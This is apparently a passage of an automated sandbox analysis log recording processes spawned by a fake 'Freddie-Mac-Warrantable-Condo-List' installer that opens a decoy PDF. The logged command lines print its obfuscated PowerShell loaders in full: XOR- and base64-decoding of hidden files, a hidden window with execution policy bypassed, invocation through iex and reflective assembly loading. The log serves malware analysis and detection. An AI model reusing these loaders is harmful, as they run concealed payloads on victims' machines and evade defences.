$0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=6276574450601077519 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=6276574450601077519 --renderer-client-id=2 --mojo-platform-channel-handle=1692 --allow-no-sandbox-job /prefetch:1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=1744333678202893021 --mojo-platform-channel-handle=1700 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8461560770759488801 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8461560770759488801 --renderer-client-id=4 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1409198475444217207 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1409198475444217207 --renderer-client-id=5 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job /prefetch:1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=296205125084197778 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=296205125084197778 --renderer-client-id=6 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WiNDOwstylE HIddeN -Ep BYPAsS -cOMMaNd '$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT()'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Process created: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp 'C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp' /SL5='$90236,102634141,825344,C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf'	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=6276574450601077519 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=6276574450601077519 --renderer-client-id=2 --mojo-platform-channel-handle=1692 --allow-no-sandbox-job /prefetch:1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=1744333678202893021 --mojo-platform-channel-handle=1700 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8461560770759488801 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8461560770759488801 --renderer-client-id=4 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1409198475444217207 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1409198475444217207 --renderer-client-id=5 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job /prefetch:1
